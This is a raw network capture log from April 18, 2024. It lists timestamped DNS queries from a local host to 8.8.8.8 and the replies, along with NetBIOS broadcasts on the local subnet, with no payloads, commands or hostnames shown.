                                                                                      Apr 18, 2024 10:24:43.196609020 CEST6050753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.301039934 CEST53605078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.304195881 CEST6050753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.408520937 CEST53605078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.415754080 CEST5044653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.520600080 CEST53504468.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.520919085 CEST5044653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.625996113 CEST53504468.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.626255989 CEST5044653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.731477022 CEST53504468.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.731726885 CEST5044653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.836400032 CEST53504468.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.836632013 CEST5044653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:43.941601992 CEST53504468.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:43.942409039 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:44.691831112 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:45.251007080 CEST5593953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:45.355560064 CEST53559398.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.356280088 CEST5593953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:45.456226110 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:45.461114883 CEST53559398.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.461335897 CEST5593953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:45.566086054 CEST53559398.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.566353083 CEST5593953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:45.671073914 CEST53559398.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.671411991 CEST5593953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:45.776412964 CEST53559398.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:45.777046919 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:46.532644987 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:47.297137976 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:48.068439007 CEST4960853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.088229895 CEST6148653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.173156977 CEST53496088.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.173419952 CEST4960853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.192960978 CEST53614868.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.193481922 CEST6148653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.277684927 CEST53496088.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.284744024 CEST6245353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.298033953 CEST53614868.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.300290108 CEST5056853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.389483929 CEST53624538.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.390090942 CEST6245353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.404927015 CEST53505688.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.405225039 CEST5056853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.494925976 CEST53624538.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.495392084 CEST6245353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.509583950 CEST53505688.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.509839058 CEST5056853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.600137949 CEST53624538.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.600399971 CEST6245353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.614639997 CEST53505688.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.614787102 CEST5056853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.705135107 CEST53624538.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.705403090 CEST6245353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.719130039 CEST53505688.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.719336033 CEST5056853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:48.810014963 CEST53624538.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:48.824213028 CEST53505688.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:55.998702049 CEST6146753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:56.102999926 CEST53614678.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.104008913 CEST6146753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:56.208812952 CEST53614678.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.209227085 CEST6146753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:56.314011097 CEST53614678.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.316143990 CEST6146753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:56.421336889 CEST53614678.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.421596050 CEST6146753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:56.526901007 CEST53614678.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:56.527610064 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:57.281117916 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:58.045475960 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:24:58.818582058 CEST6161853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:58.923811913 CEST53616188.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:58.924282074 CEST6161853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:59.029186010 CEST53616188.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:24:59.029728889 CEST6161853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:24:59.134315014 CEST53616188.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:04.520359993 CEST6161853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:04.625153065 CEST53616188.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:05.510601044 CEST5442253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:05.615554094 CEST53544228.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:05.615855932 CEST5442253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:05.720624924 CEST53544228.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:05.721180916 CEST5442253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:05.826044083 CEST53544228.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:05.826286077 CEST5442253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:05.931366920 CEST53544228.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:05.931731939 CEST5442253192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:06.036643982 CEST53544228.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:06.037314892 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:06.797132969 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:07.478336096 CEST5207453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:07.561548948 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:07.583297014 CEST53520748.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:07.584295034 CEST5207453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:07.689182997 CEST53520748.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:07.689439058 CEST5207453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:07.794476032 CEST53520748.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:07.794723988 CEST5207453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:07.899600983 CEST53520748.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:07.899849892 CEST5207453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:08.004851103 CEST53520748.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:08.005544901 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:08.530057907 CEST5033753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:08.634907007 CEST53503378.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:08.635113001 CEST5033753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:08.739793062 CEST53503378.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:08.740108967 CEST5033753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:08.762892962 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:08.844893932 CEST53503378.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:08.845124960 CEST5033753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:08.949970961 CEST53503378.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:08.950258017 CEST5033753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:09.055126905 CEST53503378.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:09.055887938 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:09.527348995 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:09.807909012 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:09.996020079 CEST6182653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.101432085 CEST53618268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.101686954 CEST6182653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.206696033 CEST53618268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.206945896 CEST6182653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.302309036 CEST5632953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.311572075 CEST53618268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.311800957 CEST6182653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.407010078 CEST53563298.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.407263041 CEST5632953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.416579962 CEST53618268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.416843891 CEST6182653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.512345076 CEST53563298.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.520540953 CEST5632953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.522171021 CEST53618268.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.531646013 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:10.572292089 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:10.625241995 CEST53563298.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.625507116 CEST5632953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.730746984 CEST53563298.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.731338978 CEST5632953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:10.836072922 CEST53563298.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:10.836709976 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:11.289916992 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:11.343674898 CEST6346953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:11.448199034 CEST53634698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:11.452363968 CEST6346953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:11.556700945 CEST53634698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:11.560230970 CEST6346953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:11.586354017 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:11.664988995 CEST53634698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:11.665415049 CEST6346953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:11.770291090 CEST53634698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:11.770601988 CEST6346953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:11.875487089 CEST53634698.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:11.876075983 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:12.054318905 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:12.350711107 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:12.631526947 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:12.826034069 CEST5944753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:12.930912971 CEST53594478.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:12.931303978 CEST5944753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.036251068 CEST53594478.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.036676884 CEST5944753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.122720003 CEST5182853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.141865015 CEST53594478.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.142091036 CEST5944753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.227605104 CEST53518288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.227844000 CEST5182853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.247337103 CEST53594478.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.247616053 CEST5944753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.333023071 CEST53518288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.333240032 CEST5182853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.352905035 CEST53594478.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.353507996 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:13.395994902 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:13.438180923 CEST53518288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.438505888 CEST5182853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.543231010 CEST53518288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.543540001 CEST5182853192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:13.648858070 CEST53518288.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:13.649589062 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:14.113533020 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:14.176754951 CEST5340653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:14.281635046 CEST53534068.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:14.281838894 CEST5340653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:14.386626005 CEST53534068.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:14.386848927 CEST5340653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:14.409919977 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:14.491580009 CEST53534068.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:14.491825104 CEST5340653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:14.596282005 CEST53534068.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:14.596518993 CEST5340653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:14.701714039 CEST53534068.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:14.702328920 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:14.878040075 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:15.174482107 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:15.455190897 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:15.652080059 CEST5634553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:15.758166075 CEST53563458.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:15.758512020 CEST5634553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:15.863280058 CEST53563458.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:15.863524914 CEST5634553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:15.948753119 CEST5187053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:15.968234062 CEST53563458.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:15.968429089 CEST5634553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:16.053479910 CEST53518708.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.054028988 CEST5187053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:16.073370934 CEST53563458.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.073586941 CEST5634553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:16.158512115 CEST53518708.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.158782959 CEST5187053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:16.177798033 CEST53563458.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.178360939 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:16.219523907 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:16.263518095 CEST53518708.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.263794899 CEST5187053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:16.368520021 CEST53518708.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.368724108 CEST5187053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:16.473067999 CEST53518708.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:16.479986906 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:16.937676907 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:16.994009018 CEST6500953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:17.098417997 CEST53650098.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:17.098876953 CEST6500953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:17.203258038 CEST53650098.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:17.203530073 CEST6500953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:17.233521938 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:17.308247089 CEST53650098.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:17.308537006 CEST6500953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:17.412888050 CEST53650098.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:17.414278030 CEST6500953192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:17.518621922 CEST53650098.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:17.519150972 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:17.701536894 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:17.997925997 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:18.278722048 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:18.474601984 CEST6495653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.578928947 CEST53649568.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.579118967 CEST6495653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.683840036 CEST53649568.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.684026003 CEST6495653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.771708965 CEST5452153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.788434982 CEST53649568.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.789347887 CEST6495653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.876569033 CEST53545218.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.877000093 CEST5452153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.893927097 CEST53649568.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.894135952 CEST6495653192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.981931925 CEST53545218.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.982201099 CEST5452153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:18.998943090 CEST53649568.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:18.999562025 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:19.043140888 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:19.086460114 CEST53545218.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:19.086786985 CEST5452153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:19.191555977 CEST53545218.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:19.191781044 CEST5452153192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:19.296025038 CEST53545218.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:19.296711922 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:19.763140917 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:19.848297119 CEST4975053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:19.955492973 CEST53497508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:19.955879927 CEST4975053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:20.057135105 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:20.060045958 CEST53497508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:20.072670937 CEST4975053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:20.176865101 CEST53497508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:20.177155018 CEST4975053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:20.281358004 CEST53497508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:20.281771898 CEST4975053192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:20.386228085 CEST53497508.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:20.387573957 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:20.525134087 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:20.821618080 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:21.150479078 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:21.298233032 CEST6468753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.403492928 CEST53646878.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.403717041 CEST6468753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.508846045 CEST53646878.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.509084940 CEST6468753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.593378067 CEST6508453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.614125967 CEST53646878.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.621275902 CEST6337353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.698522091 CEST53650848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.698740959 CEST6508453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.726119041 CEST53633738.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.735538960 CEST6337353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.803601027 CEST53650848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.803832054 CEST6508453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.840003967 CEST53633738.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.848181009 CEST6337353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.909017086 CEST53650848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.909229994 CEST6508453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:21.913527966 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:21.953030109 CEST53633738.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:21.953242064 CEST6337353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:22.013854027 CEST53650848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:22.014059067 CEST6508453192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:22.058188915 CEST53633738.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:22.058383942 CEST6337353192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:22.118887901 CEST53650848.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:22.125036955 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:22.163604021 CEST53633738.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:22.164047956 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:22.688958883 CEST5620753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:22.793380976 CEST53562078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:22.793675900 CEST5620753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:22.880745888 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:22.898426056 CEST53562078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:22.902527094 CEST5620753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:22.927542925 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:23.007734060 CEST53562078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:23.008178949 CEST5620753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:23.113130093 CEST53562078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:23.113344908 CEST5620753192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:23.218529940 CEST53562078.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:23.256566048 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:23.645145893 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:23.691932917 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:24.019568920 CEST137137192.168.2.22192.168.2.255
                                                                                      Apr 18, 2024 10:25:24.419750929 CEST5195553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:24.524755955 CEST53519558.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:24.526748896 CEST5195553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:24.631299973 CEST53519558.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:24.632158995 CEST5195553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:24.736793995 CEST53519558.8.8.8192.168.2.22
                                                                                      Apr 18, 2024 10:25:24.737422943 CEST5195553192.168.2.228.8.8.8
                                                                                      Apr 18, 2024 10:25:24.783965111 CEST137137192.168.2.22192.168.2.255
